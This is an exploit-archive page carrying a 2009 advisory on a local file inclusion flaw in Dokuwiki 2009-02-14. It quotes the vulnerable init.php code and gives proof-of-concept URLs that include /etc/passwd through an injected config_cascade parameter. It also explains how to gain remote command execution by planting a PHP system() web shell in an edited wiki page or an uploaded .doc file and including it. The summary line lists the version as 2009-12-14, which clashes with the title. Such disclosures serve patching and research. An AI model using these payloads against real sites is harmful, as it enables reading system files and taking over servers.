Dokuwiki 2009-02-14 Local File Inclusion

Dokuwiki 2009-02-14 Local File Inclusion: Posted May 27, 2009; Authored by __GiReX__ | Site girex.altervista.org; Dokuwiki version 2009-12-14 suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | ecd95ad58b235cc91ac0f996454e5df1ce95e19e89882bf8927c1c5241a59382; Download | Favorite | View

Dokuwiki 2009-02-14 Local File Inclusion

# Author_    girex
# Homepage_    girex.altervista.org

# CMS_      Dokuwiki
# Homepage_    dokuwiki.org

# Affected versions_  2009-02-14
      rc2009-02-06
      rc2009-01-30

# Bug_      Local file inclusion
# Need_      register_globals = On


# Vuln description_
# File:  /inc/init.php

  // if available load a preload config file
  $preload = fullpath(dirname(__FILE__)).'/preload.php';
  if (@file_exists($preload)) include($preload);

  ...

  //set the configuration cascade - but only if its not already been set in preload.php
  global $config_cascade;
  if (empty($config_cascade)) {
    $config_cascade = array(
      'main' => array(
        'default'   => array(DOKU_CONF.'dokuwiki.php'),
        'local'     => array(DOKU_CONF.'local.php'),
        'protected' => array(DOKU_CONF.'local.protected.php'),
      ),
  
  ...

  // load the global config file(s)
  foreach (array('default','local','protected') as $config_group) {
    if (empty($config_cascade['main'][$config_group])) continue;
    foreach ($config_cascade['main'][$config_group] as $config_file) {
      if (@file_exists($config_file)) {
        include($config_file);
      }
    }
  }


# File preload.php doesn't exists. (so seems for the affected versions)
# So we can set $config_cascade arrays via register globals
# It's not a RFI couse use of file_exists function.

# First of all you can check the dokuwiki's version here:
# /[host]/[path]/VERSION
# and check if it's a vulnerable version

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=/etc/passwd
# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./README

# Note:
# You can obtain a remote command execution if you can edit the content of a page
# Just insert your php code into it like: <?php system($_GET[cmd]); ?>
# And include it:

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/pages/[page_edited].txt

# Or you can check if you have permissions to upload file via:
# [host]/[path]/lib/exe/mediamanager.php

# If so, upload your file with .doc extension then include it:

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/media/[uploaded_file].doc

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Dokuwiki 2009-02-14 Local File Inclusion

Dokuwiki 2009-02-14 Local File Inclusion

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Dokuwiki 2009-02-14 Local File Inclusion

Share This

Dokuwiki 2009-02-14 Local File Inclusion

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems